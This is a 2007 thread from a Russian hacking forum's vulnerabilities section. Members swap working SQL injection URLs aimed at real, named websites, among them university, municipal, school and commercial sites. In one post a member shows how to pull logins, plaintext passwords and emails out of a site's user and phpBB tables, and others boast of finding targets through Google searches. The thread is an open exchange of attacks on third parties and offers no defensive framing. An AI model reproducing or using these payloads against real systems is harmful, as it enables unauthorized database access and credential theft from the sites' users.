HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 27.05.2007, 15:39
XenOtai
Познающий
Регистрация: 30.12.2006
Сообщений: 32
Провел на форуме:
383436

Репутация: 68
Отправить сообщение для XenOtai с помощью ICQ
По умолчанию

Код:
http://www.olympus.ru/customers/manuals/'-1+union+select+1,2,3/*
 
Ответить с цитированием

  #2  
Старый 27.05.2007, 16:00
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
По умолчанию

Цитата:
http://www.olympus.ru/customers/manuals/'-1+union+select+1,2,3/*
=>
Цитата:
http://hlamidnik.h18.ru/SQLS.html
 
Ответить с цитированием

  #3  
Старый 27.05.2007, 17:03
Ky3bMu4
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме:
1777536

Репутация: 932


Отправить сообщение для Ky3bMu4 с помощью ICQ
По умолчанию

Блин, .edu уже кажись кончаются!
Код:
http://www.leiden.edu/students/index.php3?c=-46+union+select+version()/*
 
Ответить с цитированием

  #4  
Старый 27.05.2007, 17:16
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777

Репутация: 2642


Отправить сообщение для NOmeR1 с помощью ICQ
По умолчанию

первая моя нормальная скуля ))
Цитата:
http://www.autoteatr.ru/catalog.php?id=-2494+union+select+1,VERSION(),3,4,5,6,7,8,9,10,11, 12,13/*
http://www.autoteatr.ru/catalog.php?id=-2494+union+select+1,USER(),3,4,5,6,7,8,9,10,11,12, 13/*
http://www.autoteatr.ru/catalog.php?id=-2494+union+select+1,DATABASE(),3,4,5,6,7,8,9,10,11 ,12,13/*
Токо я больше ничего сделать не смог ))
 
Ответить с цитированием

  #5  
Старый 27.05.2007, 17:17
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

вот инъекция на icq.com, но использовать ее не получится, т.к. там стоит ограничение на количество знаков, но факт в том, что инъекция есть
Код:
http://www.icq.com/boards/view_posts.php?uin=261634063-1
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

cont
  #6  
Старый 27.05.2007, 17:55
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow cont

Цитата:
первая моя нормальная скуля ))
Цитата:http://www.autoteatr.ru/catalog.php?id=-2494+union+select+1,VERSION(),3,4,5,6,7,8,9,10,11, 12,13/*
http://www.autoteatr.ru/catalog.php?id=-2494+union+select+1,USER(),3,4,5,6,7,8,9,10,11,12, 13/*
http://www.autoteatr.ru/catalog.php?id=-2494+union+select+1,DATABASE(),3,4,5,6,7,8,9,10,11 ,12,13/*



Токо я больше ничего сделать не смог ))
NOmeR1, гляди

есть таблицы: user_list (login,pwd,email,admin)
http://www.autoteatr.ru/catalog.php?id=-2494+union+select+1,concat_ws(0x3a,login,pwd,email ,admin),3,4,5,6,7,8,9,10,11,12,13+from+user_list+l imit+0,1/*

причем пароли открытые)

phpbb_users со всеми вытекающими.. (username,user_password и т.д.)
http://www.autoteatr.ru/catalog.php?id=-2494+union+select+1,concat_ws(0x3a,user_id,usernam e,user_password,user_email),3,4,5,6,7,8,9,10,11,12 ,13+from+phpbb_users+limit+1,1/*

зы. ищи внимательней

Последний раз редактировалось Серенький; 27.05.2007 в 17:59..
 
Ответить с цитированием

  #7  
Старый 27.05.2007, 18:01
Boccob
Познающий
Регистрация: 04.05.2007
Сообщений: 38
Провел на форуме:
939769

Репутация: 59
По умолчанию

Сайт по сути большая доска объявлений о продаже автомобилей:
Цитата:
http://avtomarket.by/showtransdetail.php?id=9999+union+select+1,concat( user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
 
Ответить с цитированием

  #8  
Старый 27.05.2007, 18:07
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357

Репутация: 3742


Отправить сообщение для blackybr с помощью ICQ Отправить сообщение для blackybr с помощью AIM Отправить сообщение для blackybr с помощью Yahoo
По умолчанию

5 минут гугла
Цитата:
http://www.michiganbusiness.us/showcompany.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,database(),44,45,4 6,47,48,49,50,51/*
http://haytom.us/showarticle.php?id=-1+union+select+1,2,3,4,5
http://www.fairelections.us/article.php?id=-1+union+select+1,2,3,4,version()/*
http://www.ci.bremerton.wa.us/navigation.php?id=-1'+union+select+1,2,convert(version()+using+latin1 ),4,5,6,7,8,9,10,11,12,13,14/*
http://www.trumansburg.ny.us/org_detail.php?id=43+and+(ascii(substring(user(),1 ,1))%3E0)/*
http://www.conwayschools.afsc.k12.ar.us/parents.php?id=-1+union+select+1,convert(table_name+using+latin7), 3,4+from+information_schema.tables
http://www.gwhs.denver.k12.co.us/newsstory.php?id=22+and+(ascii(substring(user(),1, 1))%3E0)/*
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием

  #9  
Старый 27.05.2007, 18:42
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://bla-bla-bla.ru/borrow/?s=-1+union+select+1,2,3,4,convert(concat(database(),char(58),user(),char(58),version()),char),6,7,8,9,10,11,12,13/*
 
Ответить с цитированием

  #10  
Старый 27.05.2007, 19:11
Ky3bMu4
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме:
1777536

Репутация: 932


Отправить сообщение для Ky3bMu4 с помощью ICQ
По умолчанию

Фуф. Вот ещё 1 .edu и 1 .net
Код:
http://bgkulinar.net/news.php?&newsid=-1358+union+select+version()/*
http://colab.hunter.cuny.edu/colabcms/event_info.php?eventID=-18+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13/*
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ